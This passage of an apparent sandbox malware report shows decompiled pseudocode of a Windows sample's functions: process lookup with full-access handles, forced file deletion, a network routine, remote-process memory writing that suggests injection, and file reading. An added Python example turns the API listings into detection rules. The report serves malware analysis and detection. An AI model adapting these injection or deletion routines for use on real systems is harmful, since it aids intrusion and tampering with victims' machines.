                          			// set, so a missing target is skipped like a directory. Comments are editorial.
                          			E005C9DB0(void* __eflags) {
                          				void* _t11;
                          				void* _t13;
                          				signed char _t16;
                          				WCHAR* _t20;
                          				signed int _t21;
                          				void* _t22;
                          				WCHAR* _t23;
                          				void* _t26;
                          				void* _t27;
                          				void* _t28;
                          				WCHAR* _t29;
                          
                          				_t11 = E005CB7A0( *0x5d9c40);
                          				_t29 = _t28 + 4;
                          				if(_t11 == 0) {
                          					_t22 = 0;
                          				} else {
                          					_t26 = _t11;
                          					_t13 = 0xfffffc00;  // -0x400: copy up to 0x200 WCHARs to the stack buffer at _t29+0x100
                          					while(1) {
                          						_t21 =  *(_t26 + _t13 + 0x400) & 0x0000ffff;
                          						if(_t21 == 0) {
                          							break;
                          						}
                          						 *(_t29 + _t13 + 0x500) = _t21;
                          						_t13 = _t13 + 2;
                          						if(_t13 != 0) {
                          							continue;
                          						} else {
                          							// no terminator within 0x200 WCHARs: terminate and fail
                          							 *((short*)(_t29 + _t13 + 0x4fe)) = 0;
                          							_t22 = 0;
                          						}
                          						L13:
                          						E005C91E0(_t26);  // RtlFreeHeap wrapper
                          						goto L14;
                          					}
                          					_t23 = _t29;
                          					 *(_t29 + _t13 + 0x500) = 0;  // NUL-terminate the copied path
                          					E005D4520(_t23, 0x69);        // produces the replacement extension (second argument of PathRenameExtensionW)
                          					_t20 =  &(_t29[0x80]);        // the copied path (WCHAR index 0x80 == byte offset 0x100)
                          					PathRenameExtensionW(_t20, _t23);
                          					_t16 = GetFileAttributesW(_t20);
                          					_t22 = 0;
                          					if((_t16 & 0x00000010) == 0) {  // FILE_ATTRIBUTE_DIRECTORY (also set in the 0xffffffff error value)
                          						_t27 = 0;
                          						while(DeleteFileW(_t20) == 0) {
                          							if(SetFileAttributesW(_t20, 0x80) == 0) {  // FILE_ATTRIBUTE_NORMAL
                          								Sleep(0x3e8);  // 1000 ms
                          							}
                          							Sleep(0x3e8);
                          							_t27 = _t27 + 1;
                          							if(_t27 < 5) {  // at most five attempts
                          								continue;
                          							}
                          							break;
                          						}
                          						_t22 = 1;  // set after the loop whether or not the delete succeeded
                          					}
                          					goto L13;
                          				}
                          				L14:
                          				return _t22;
                          			}














                          (Instruction address column for the listing above: one address per source line, 0x005c9dc0 to 0x005c9e81; 0x00000000 marks lines that map to no instruction.)

                          APIs
                          • PathRenameExtensionW.SHLWAPI(?), ref: 005C9E1F
                          • GetFileAttributesW.KERNEL32(?), ref: 005C9E26
                          • DeleteFileW.KERNEL32(?), ref: 005C9E3B
                          • SetFileAttributesW.KERNEL32(?,00000080), ref: 005C9E4B
                          • Sleep.KERNEL32(000003E8), ref: 005C9E5A
                          • Sleep.KERNEL32(000003E8), ref: 005C9E61
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: File$AttributesSleep$DeleteExtensionPathRename
                          • String ID:
                          • API String ID: 1756145437-0
                          • Opcode ID: ea4ea9cedbb261927446a44fe7b02fed37d96128bfbde33f7f5611e343608966
                          • Instruction ID: d166fa59cabdc955f33f317d8fc6909aabb7bc3803109817d96ebd939faf9c03
                          • Opcode Fuzzy Hash: ea4ea9cedbb261927446a44fe7b02fed37d96128bfbde33f7f5611e343608966
                          • Instruction Fuzzy Hash: 721127715003045BE730B769EC4EF6B3B9DFFD0759F15143EE54A86191FA3448058252
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			// Walks the process list (CreateToolhelp32Snapshot with TH32CS_SNAPPROCESS == 2,
                          			// Process32FirstW/NextW over a PROCESSENTRY32W, whose size is 0x22c) and compares
                          			// each szExeFile case-insensitively with the target name at _v4. On a match it
                          			// calls OpenProcess with PROCESS_ALL_ACCESS (0x1fffff) on that PID, stores the
                          			// handle through _v0 and zeroes the field at +0x78 of the object passed in __ecx.
                          			// Returns 1 only if a handle was obtained. The `_t11 != 1` test is a decompiler
                          			// artefact: it is the BOOL return of Process32FirstW that is tested, not the
                          			// struct pointer. Comments are editorial.
                          			E005C9A60(intOrPtr __ecx) {
                          				void** _v0;
                          				WCHAR* _v4;
                          				char _v544;
                          				long _v572;
                          				char _v576;
                          				void* _v580;
                          				void* _t9;
                          				struct tagPROCESSENTRY32W* _t11;
                          				void* _t14;
                          				int _t17;
                          				WCHAR* _t18;
                          				intOrPtr _t23;
                          				WCHAR* _t24;
                          				void* _t25;
                          				intOrPtr* _t27;
                          
                          				_t23 = __ecx;
                          				_v572 = 0x22c;  // sizeof(PROCESSENTRY32W)
                          				_t9 = CreateToolhelp32Snapshot(2, 0);  // TH32CS_SNAPPROCESS
                          				if(_t9 == 0xffffffff) {  // INVALID_HANDLE_VALUE
                          					_t17 = 0;
                          					L10:
                          					return _t17;
                          				}
                          				_t25 = _t9;
                          				_t11 =  &_v576;
                          				Process32FirstW(_t25, _t11);
                          				_t17 = 0;
                          				if(_t11 != 1) {  // decompiler artefact, see header comment
                          					L9:
                          					CloseHandle(_t25);
                          					goto L10;
                          				}
                          				 *_t27 = _t23;
                          				_t24 = _v4;            // target executable name
                          				_t18 =  &_v544;        // szExeFile of the current entry
                          				while(lstrcmpiW(_t18, _t24) != 0) {
                          					if(Process32NextW(_t25,  &_v580) == 1) {
                          						continue;
                          					}
                          					_t17 = 0;  // end of list without a match
                          					goto L9;
                          				}
                          				_t14 = OpenProcess(0x1fffff, 0, _v572);  // PROCESS_ALL_ACCESS, bInheritHandle = FALSE, matched PID
                          				_t17 = 0;
                          				if(_t14 != 0) {
                          					_t17 = 1;
                          					 *( *_t27 + 0x78) = 0;
                          					 *_v0 = _t14;  // hand the process handle back to the caller
                          				}
                          				goto L9;
                          			}


















                          (Instruction address column for the listing above: one address per source line, 0x005c9a6a to 0x005c9b10; 0x00000000 marks lines that map to no instruction.)

                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005C9A78
                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 005C9A8B
                          • lstrcmpiW.KERNEL32(?,?), ref: 005C9AAE
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 005C9ABA
                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 005C9AD8
                          • CloseHandle.KERNEL32(00000000), ref: 005C9AFE
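                          The two API listings above (the forced-delete loop of E005C9DB0 and the process lookup of E005C9A60) are the kind of per-function evidence that is worth turning into machine-checkable indicators. The following is an added example, not Joe Sandbox tooling and not the sample's code: a small parser for the "APIs" bullet format used on this page, followed by two rules that match those listings. The rule names are this example's own labels; the input listings are copied from this page and embedded as constructed input.

```python
"""Parse Joe Sandbox 'APIs' bullets into call records and flag behaviour patterns.
Added example; the rule names and the has_call/flag_behaviours helpers are this
example's own, not part of Joe Sandbox."""
import re

# One bullet: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.MODULE(arg,arg,...), ref: XXXXXXXX. "?" is an argument the analyzer
# could not recover; every other argument is a hex DWORD.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<subfn>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)

PROCESS_ALL_ACCESS = 0x1FFFFF
FILE_ATTRIBUTE_NORMAL = 0x80


def parse_arg(token):
    token = token.strip()
    return None if token in ("", "?") else int(token, 16)


def parse_api_lines(text):
    """Return one dict per bullet, in listing order."""
    return [
        {
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [parse_arg(a) for a in m.group("args").split(",")],
            "ref": int(m.group("ref"), 16),
            "subcall_of": m.group("subfn"),  # None for the function's own calls
        }
        for m in API_LINE.finditer(text)
    ]


def has_call(calls, api, arg_index=None, value=None):
    """True if `api` appears; with arg_index/value, that argument must match too."""
    for c in calls:
        if c["api"] != api:
            continue
        if arg_index is None:
            return True
        if len(c["args"]) > arg_index and c["args"][arg_index] == value:
            return True
    return False


def flag_behaviours(calls):
    flags = set()
    # Process enumeration followed by a full-access handle to a chosen PID.
    if has_call(calls, "CreateToolhelp32Snapshot") and has_call(calls, "OpenProcess", 0, PROCESS_ALL_ACCESS):
        flags.add("process-lookup-all-access")
    # Delete loop that strips attributes to NORMAL and sleeps between attempts.
    if (has_call(calls, "DeleteFileW") and has_call(calls, "Sleep")
            and has_call(calls, "SetFileAttributesW", 1, FILE_ATTRIBUTE_NORMAL)):
        flags.add("forced-delete-with-retry")
    return flags


# Constructed input: the listings for E005C9A60 and E005C9DB0 as printed on this page.
PROCESS_LOOKUP_LISTING = """
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005C9A78
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 005C9A8B
• lstrcmpiW.KERNEL32(?,?), ref: 005C9AAE
• Process32NextW.KERNEL32(00000000,0000022C), ref: 005C9ABA
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 005C9AD8
• CloseHandle.KERNEL32(00000000), ref: 005C9AFE
"""
DELETE_LISTING = """
• PathRenameExtensionW.SHLWAPI(?), ref: 005C9E1F
• GetFileAttributesW.KERNEL32(?), ref: 005C9E26
• DeleteFileW.KERNEL32(?), ref: 005C9E3B
• SetFileAttributesW.KERNEL32(?,00000080), ref: 005C9E4B
• Sleep.KERNEL32(000003E8), ref: 005C9E5A
• Sleep.KERNEL32(000003E8), ref: 005C9E61
"""
# Two bullets from the E005CC510 listing, to exercise the subcall prefix.
FILE_READ_LISTING = """
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005CC547
  • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
"""

if __name__ == "__main__":
    for name, listing in (("E005C9A60", PROCESS_LOOKUP_LISTING), ("E005C9DB0", DELETE_LISTING)):
        print(name, sorted(flag_behaviours(parse_api_lines(listing))))
```

Matching on argument values rather than API names alone is what keeps these rules useful: OpenProcess is common in benign code, OpenProcess with 0x1FFFFF right after a Toolhelp walk is not.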
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextOpenProcessSnapshotToolhelp32lstrcmpi
                          • String ID:
                          • API String ID: 3301242143-0
                          • Opcode ID: df07ca65d4aab85767cb21b078c200c835025d89ebfbbaf922059854aec050f0
                          • Instruction ID: ec0dc2c98dedaa73ce45535a3368246891d55d6ad012572769d894cb44435601
                          • Opcode Fuzzy Hash: df07ca65d4aab85767cb21b078c200c835025d89ebfbbaf922059854aec050f0
                          • Instruction Fuzzy Hash: DF119E31205200AFD3206FA4DCCCF6BBBE8FB85314F14452EF659862A0D7758C09D761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 46%
                          			E005C7A60() {
                          				intOrPtr _v4;
                          				char _v416;
                          				char _v624;
                          				char _v824;
                          				intOrPtr _v828;
                          				intOrPtr _v832;
                          				intOrPtr _v836;
                          				intOrPtr _v840;
                          				intOrPtr _v844;
                          				intOrPtr _v848;
                          				intOrPtr _v852;
                          				char _v856;
                          				char _v860;
                          				char _v864;
                          				char _v868;
                          				intOrPtr _v884;
                          				intOrPtr _t36;
                          				intOrPtr _t39;
                          				intOrPtr _t40;
                          				intOrPtr _t41;
                          				void* _t47;
                          				intOrPtr _t48;
                          				intOrPtr _t52;
                          				signed int _t54;
                          				char _t58;
                          				unsigned int _t62;
                          				intOrPtr _t67;
                          				void* _t68;
                          				intOrPtr _t69;
                          				char* _t71;
                          
                          				_t72 =  &_v848;
                          				_t58 = 0;
                          				_v860 = 0;
                          				_v864 = 0;
                          				_push( &_v416);
                          				_push(0x202);
                          				if( *0x5d9eac() != 0) {
                          					L31:
                          					_t32 = _v868;
                          					if(_v868 != 0) {
                          						E005C91E0(_t32);
                          					}
                          					 *0x5d9eb4();
                          					return _t58;
                          				}
                          				_t36 = E005C3180(0x100, 0);
                          				_t72 =  &_v848 + 8;
                          				_t69 = _t36;
                          				if(_t36 == 0) {
                          					L26:
                          					_t58 = 0;
                          					_t67 = 0;
                          					L27:
                          					if(_t69 != 0) {
                          						E005C91E0(_t69);
                          						_t72 = _t72 + 4;
                          					}
                          					if(_t67 != 0) {
                          						E005C91E0(_t67);
                          						_t72 = _t72 + 4;
                          					}
                          					goto L31;
                          				}
                          				_t39 = E005CA3C0(_v4);
                          				if(_t39 == 0) {
                          					goto L26;
                          				}
                          				_v864 = _t39;
                          				_t40 = 0;
                          				_t68 = 0;
                          				_v860 = _t69;
                          				L4:
                          				if(_t40 != 0) {
                          					E005C91E0(_t40);
                          					_t72 = _t72 + 4;
                          				}
                          				_t41 =  *_t72;
                          				_v868 = 0;
                          				if(_t41 != 0) {
                          					 *0x5d9ea4(_t41);
                          				}
                          				_t58 = 0;
                          				 *_t72 = 0;
                          				E005D4520( &_v624, 0x40);
                          				_t8 = _t68 + 0x12; // 0x13
                          				_t71 =  &_v824;
                          				E005CD470(_t71, _t8);
                          				_push(_t71);
                          				_t69 = _v860;
                          				E005D68E0(_t69, 0x80,  &_v624, _v864);
                          				_t47 = E005D2E70(_t69, 0,  &_v868, 0xffffffff);
                          				_t72 = _t72 + 0x34;
                          				if(_t47 == 0) {
                          					goto L23;
                          				}
                          				_v828 = 0;
                          				_v832 = 0;
                          				_v836 = 0;
                          				_v840 = 0;
                          				_v844 = 0;
                          				_v856 = 0;
                          				_v848 = 1;
                          				_v852 = 2;
                          				 *0x5d9ea8(_v868, 0,  &_v856, _t72);
                          				if(0 == 0) {
                          					_t52 =  *_t72;
                          					if(_t52 == 0) {
                          						goto L10;
                          					}
                          					_t54 =  *( *((intOrPtr*)(_t52 + 0x18)) + 4);
                          					if(_t68 == 0) {
                          						_t27 = _t54 - 0x200007f; // -33554559
                          						_t62 = _t27;
                          						asm("rol edx, 0x8");
                          						if(_t62 >= 8) {
                          							L19:
                          							if((_t54 | 0x01000000) == 0xb00007f) {
                          								L22:
                          								_t58 = 1;
                          								goto L23;
                          							}
                          							L20:
                          							_t68 = _t68 + 1;
                          							L11:
                          							_t40 = _v884;
                          							goto L4;
                          						}
                          						asm("bt edx, ecx");
                          						if(_t62 >> 0x18 < 0) {
                          							goto L22;
                          						}
                          						goto L19;
                          					}
                          					_t26 = _t68 - 1; // -1
                          					if(_t26 > 2) {
                          						if(_t54 != 0x600007f) {
                          							goto L10;
                          						}
                          						goto L22;
                          					}
                          					if(_t54 != 0x200007f) {
                          						goto L20;
                          					}
                          					goto L22;
                          				}
                          				L10:
                          				_t68 = _t68 + 1;
                          				if(_t68 > 4) {
                          					goto L23;
                          				}
                          				goto L11;
                          				L23:
                          				_t48 =  *_t72;
                          				if(_t48 != 0) {
                          					 *0x5d9ea4(_t48);
                          				}
                          				_t67 = _v864;
                          				goto L27;
                          			}

                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 005C7A80
                          • WSACleanup.WS2_32 ref: 005C7C2E
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                          • FreeAddrInfoW.WS2_32(00000000), ref: 005C7AE4
                          • getaddrinfo.WS2_32(?,00000000,00000002), ref: 005C7B7A
                          • FreeAddrInfoW.WS2_32(00000000), ref: 005C7BF3
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: AddrFreeHeapInfo$AllocateCleanupProcessStartupgetaddrinfo
                          • String ID:
                          • API String ID: 2060111366-0
                          • Opcode ID: dfe5de54cf8ba147c487adc365812c7bf860cea1d6713c1fb8bb331064000445
                          • Instruction ID: 6057e7009fad9c59516f1c9d86652d7e0cf8a548ccaa901e5fba027e6d14d73e
                          • Opcode Fuzzy Hash: dfe5de54cf8ba147c487adc365812c7bf860cea1d6713c1fb8bb331064000445
                          • Instruction Fuzzy Hash: D9517C71908206AFE720DFA59C89F6BBAE8BF98748F04492DF449C2641F735DD048A62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E005D0090(void* __eax, intOrPtr* __ecx) {
                          				intOrPtr _t22;
                          				void* _t23;
                          				void* _t26;
                          				WCHAR** _t33;
                          				WCHAR** _t41;
                          				intOrPtr* _t49;
                          				void* _t59;
                          				WCHAR** _t60;
                          				WCHAR** _t61;
                          				WCHAR* _t78;
                          				void* _t79;
                          				intOrPtr* _t80;
                          				void* _t81;
                          				void* _t82;
                          				void* _t83;
                          				void* _t84;
                          				intOrPtr* _t85;
                          				WCHAR** _t87;
                          				WCHAR** _t88;
                          
                          				_t80 = __ecx;
                          				_push( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x18)) + 8)));
                          				_t22 = E005CC720();
                          				if(_t22 == 0) {
                          					return _t22;
                          				}
                          				 *_t85 = _t22;
                          				_t23 = E005C5140(0x10);
                          				_t87 = _t85 + 4;
                          				_t59 = _t23;
                          				E005C91B0(_t23, 4);
                          				 *0x5d9d54(0x5d9bbc);
                          				if( *_t80 == 0) {
                          					L6:
                          					_t26 = E005CC430(_t59);
                          					_t78 =  *_t87;
                          					if(_t26 == 0) {
                          						L11:
                          						 *0x5d9d9c(0x5d9bbc);
                          						E005C1EA0(_t59);
                          						L005D7400(_t59);
                          						_t88 =  &(_t87[1]);
                          						if(E005CC430( *((intOrPtr*)(_t80 + 0x10))) == 0) {
                          							L18:
                          							if(E005CC430( *((intOrPtr*)(_t80 + 0x14))) == 0) {
                          								L25:
                          								return E005C91E0(_t78);
                          							}
                          							_t81 = 0;
                          							do {
                          								_t33 = E005C42F0( *((intOrPtr*)(_t80 + 0x14)), _t81);
                          								_t60 = _t33;
                          								if(lstrcmpiW( *_t33, _t78) == 0) {
                          									E005C91E0( *_t60);
                          									_t88 =  &(_t88[1]);
                          									_t37 = _t60[1];
                          									if(_t60[1] != 0) {
                          										E005C91E0(_t37);
                          										_t88 =  &(_t88[1]);
                          									}
                          									E005CD310( *((intOrPtr*)(_t80 + 0x14)), _t81);
                          									_t18 = _t81 - 1; // -1
                          									_t81 =  !=  ? _t18 : _t81;
                          								}
                          								_t81 = _t81 + 1;
                          							} while (_t81 < E005CC430( *((intOrPtr*)(_t80 + 0x14))));
                          							goto L25;
                          						}
                          						_t82 = 0;
                          						do {
                          							_t41 = E005C42F0( *((intOrPtr*)(_t80 + 0x10)), _t82);
                          							_t61 = _t41;
                          							if(lstrcmpiW( *_t41, _t78) == 0) {
                          								_t44 = _t61[1];
                          								if(_t61[1] != 0) {
                          									E005C91E0(_t44);
                          									_t88 =  &(_t88[1]);
                          								}
                          								E005C91E0( *_t61);
                          								_t88 =  &(_t88[1]);
                          								E005CD310( *((intOrPtr*)(_t80 + 0x10)), _t82);
                          								_t12 = _t82 - 1; // -1
                          								_t82 =  !=  ? _t12 : _t82;
                          							}
                          							_t82 = _t82 + 1;
                          						} while (_t82 < E005CC430( *((intOrPtr*)(_t80 + 0x10))));
                          						goto L18;
                          					}
                          					_t83 = 0;
                          					do {
                          						_t49 = E005C42F0(_t59, _t83);
                          						_t50 =  *_t49;
                          						if( *_t49 != 0) {
                          							E005CD6B0(_t80, _t50, 0, _t87[7]);
                          						}
                          						_t83 = _t83 + 1;
                          					} while (_t83 < E005CC430(_t59));
                          					goto L11;
                          				}
                          				_t84 = 0;
                          				_t79 = 0;
                          				do {
                          					if(lstrcmpiW( *( *((intOrPtr*)( *((intOrPtr*)(_t80 + 4)) + _t84)) + 8),  *_t87) == 0) {
                          						E005C1200(_t59,  *((intOrPtr*)(_t80 + 4)) + _t84);
                          					}
                          					_t79 = _t79 + 1;
                          					_t84 = _t84 + 4;
                          				} while (_t79 <  *_t80);
                          				goto L6;
                          			}

                          APIs
                          • RtlEnterCriticalSection.NTDLL(005D9BBC), ref: 005D00C8
                          • lstrcmpiW.KERNEL32(?,?,?,00000000,00000000,?,00000000,005CCB66), ref: 005D00E3
                          • RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005D013F
                          • lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000,005CCB66), ref: 005D0171
                          • lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000,005CCB66), ref: 005D01CF
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: lstrcmpi$CriticalSection$EnterLeave
                          • String ID:
                          • API String ID: 3699066220-0
                          • Opcode ID: 7e7532ef1e58fca7423902032cea1be5c941c5bee592e78b864112836d914bdb
                          • Instruction ID: ca05997229098d9ee6a778ed02a338c09484f6a99c471128f2152787ea4b6094
                          • Opcode Fuzzy Hash: 7e7532ef1e58fca7423902032cea1be5c941c5bee592e78b864112836d914bdb
                          • Instruction Fuzzy Hash: 714187747042069FDB30BFE5DC5EF2B7EA9BF80745F04042EF84A86292EA61E805D661
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E005D5320(void* __ecx, void* __eflags) {
                          				void* _t38;
                          				intOrPtr _t39;
                          				signed int _t40;
                          				void* _t41;
                          				void* _t42;
                          				void* _t54;
                          				void* _t57;
                          				void* _t58;
                          				void* _t63;
                          				intOrPtr* _t69;
                          				intOrPtr _t70;
                          				void* _t72;
                          				void* _t76;
                          				signed int* _t77;
                          				void* _t78;
                          				intOrPtr* _t79;
                          
                          				_t76 = __ecx;
                          				E005D7C90( *((intOrPtr*)(__ecx + 0x60)),  *((intOrPtr*)(__ecx + 0x64)));
                          				_t79 = _t78 + 8;
                          				_t38 =  *(_t76 + 0x5c);
                          				if(_t38 != 0) {
                          					_t69 = _t79 + 4;
                          					 *_t69 = 0;
                          					_push(0);
                          					_push(0);
                          					_push(_t38);
                          					_push(_t69);
                          					_push(3);
                          					_push( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x60)) +  *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x60)) + 0x3c)) + 0x28)) + _t38);
                          					_push(_t76);
                          					E005D3FA0();
                          					_t79 = _t79 + 0x1c;
                          				}
                          				if( *((intOrPtr*)(_t76 + 0x7c)) == 0 || E005D3DF0(_t76) != 0) {
                          					_t70 =  *((intOrPtr*)(_t76 + 0x60));
                          					_t39 =  *((intOrPtr*)(_t70 + 0x3c));
                          					 *_t79 = _t39;
                          					_t40 =  *(_t70 + _t39 + 6) & 0x0000ffff;
                          					if(_t40 == 0) {
                          						L9:
                          						_t57 =  *(_t76 + 0x5c);
                          						_t41 =  *(_t76 + 0x70);
                          						if(_t57 != 0) {
                          							VirtualFreeEx(_t41, _t57, 0, 0x8000);
                          							_t58 =  *(_t76 + 0x5c);
                          							_t41 =  *(_t76 + 0x70);
                          							if(_t58 != 0) {
                          								VirtualFreeEx(_t41, _t58,  *(_t70 +  *((intOrPtr*)(_t79 + 4)) + 0x50), 0x4000);
                          								_t41 =  *(_t76 + 0x70);
                          							}
                          						}
                          						if(_t41 != 0) {
                          							CloseHandle(_t41);
                          							 *(_t76 + 0x70) = 0;
                          						}
                          						_t42 =  *(_t76 + 0x74);
                          						if(_t42 != 0) {
                          							CloseHandle(_t42);
                          							 *(_t76 + 0x74) = 0;
                          						}
                          						_t72 = 1;
                          						 *((intOrPtr*)(_t76 + 0x80)) = 0;
                          						 *((intOrPtr*)(_t76 + 0x44)) = 0;
                          						goto L18;
                          					}
                          					_t54 = 0;
                          					_t77 = _t70 + ( *(_t70 +  *_t79 + 0x14) & 0x0000ffff) +  *_t79 + 0x24;
                          					do {
                          						_t63 =  *(_t76 + 0x5c) + ( *_t77 << 2);
                          						if(_t63 != 0) {
                          							VirtualFreeEx( *(_t76 + 0x70), _t63, 0, 0x8000);
                          							_t40 =  *(_t70 +  *_t79 + 6) & 0x0000ffff;
                          						}
                          						_t54 = _t54 + 1;
                          						_t77 =  &(_t77[0xa]);
                          					} while (_t54 < (_t40 & 0x0000ffff));
                          					goto L9;
                          				} else {
                          					_t72 = 0;
                          					L18:
                          					E005D7C90( *((intOrPtr*)(_t76 + 0x60)),  *((intOrPtr*)(_t76 + 0x64)));
                          					return _t72;
                          				}
                          			}

                          APIs
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000,?,?,?,005CD839), ref: 005D53B0
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000,?,?,?,005CD839), ref: 005D53DC
                          • VirtualFreeEx.KERNEL32(?,?,?,00004000,?,?,?,005CD839), ref: 005D53FB
                          • CloseHandle.KERNEL32(?), ref: 005D5409
                          • CloseHandle.KERNEL32(?), ref: 005D541E
                            • Part of subcall function 005D3FA0: ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D3FCD
                            • Part of subcall function 005D3FA0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 005D4070
                            • Part of subcall function 005D3FA0: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,00003000,00000040), ref: 005D4095
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Virtual$Free$CloseHandleMemoryProcess$AllocReadWrite
                          • String ID:
                          • API String ID: 1889406058-0
                          • Opcode ID: aeeb6352b80cdf8a5ea3b40a276fa491a07fa15c152a66d0221b5d6a8fd61944
                          • Instruction ID: f5329dea773c4350320d1615488aea492bf40b7411864354a086e58501b51369
                          • Opcode Fuzzy Hash: aeeb6352b80cdf8a5ea3b40a276fa491a07fa15c152a66d0221b5d6a8fd61944
                          • Instruction Fuzzy Hash: 7E418774600B01ABDB359F29DC89B2ABBE5FB44705F04491FE98287790EB70F815CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E005D5630(void* __eax, void* __ecx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                          				long _v20;
                          				void* _t9;
                          				long _t13;
                          				void* _t15;
                          				void* _t19;
                          				signed int _t20;
                          				void* _t24;
                          				void* _t26;
                          				long _t27;
                          				DWORD* _t29;
                          
                          				_t20 = 0;
                          				_v20 = 0;
                          				_t9 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                          				_t26 = _t9;
                          				if(_t9 == 0xffffffff) {
                          					_t24 = 0;
                          					goto L7;
                          				} else {
                          					_t20 = 0;
                          					_t13 = SetFilePointer(_t26, 0, 0, 2);
                          					_t27 = _t13;
                          					_v20 = _t13;
                          					SetFilePointer(_t26, 0, 0, 0);
                          					_t15 = E005C3180(_t27, 0);
                          					_t29 =  &(_t29[2]);
                          					_t24 = _t15;
                          					if(_t15 != 0 && ReadFile(_t26, _t24, _t27, _t29, 0) != 0) {
                          						E005D7C90(_t24, _v20);
                          						_push(_a12);
                          						_push(_a8);
                          						_t19 = E005D4830(_t24, _v20);
                          						_t29 =  &(_t29[6]);
                          						_t20 = 0 | _t19 != 0x00000000;
                          					}
                          					if(_t26 != 0) {
                          						L7:
                          						CloseHandle(_t26);
                          					} else {
                          					}
                          				}
                          				if(_t24 != 0) {
                          					E005C91E0(_t24);
                          					_t29 =  &(_t29[1]);
                          				}
                          				return _t20;
                          			}

                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 005D564F
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005D5669
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005D5674
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005D568E
                          • CloseHandle.KERNEL32(00000000), ref: 005D56CB
                          Memory Dump Source
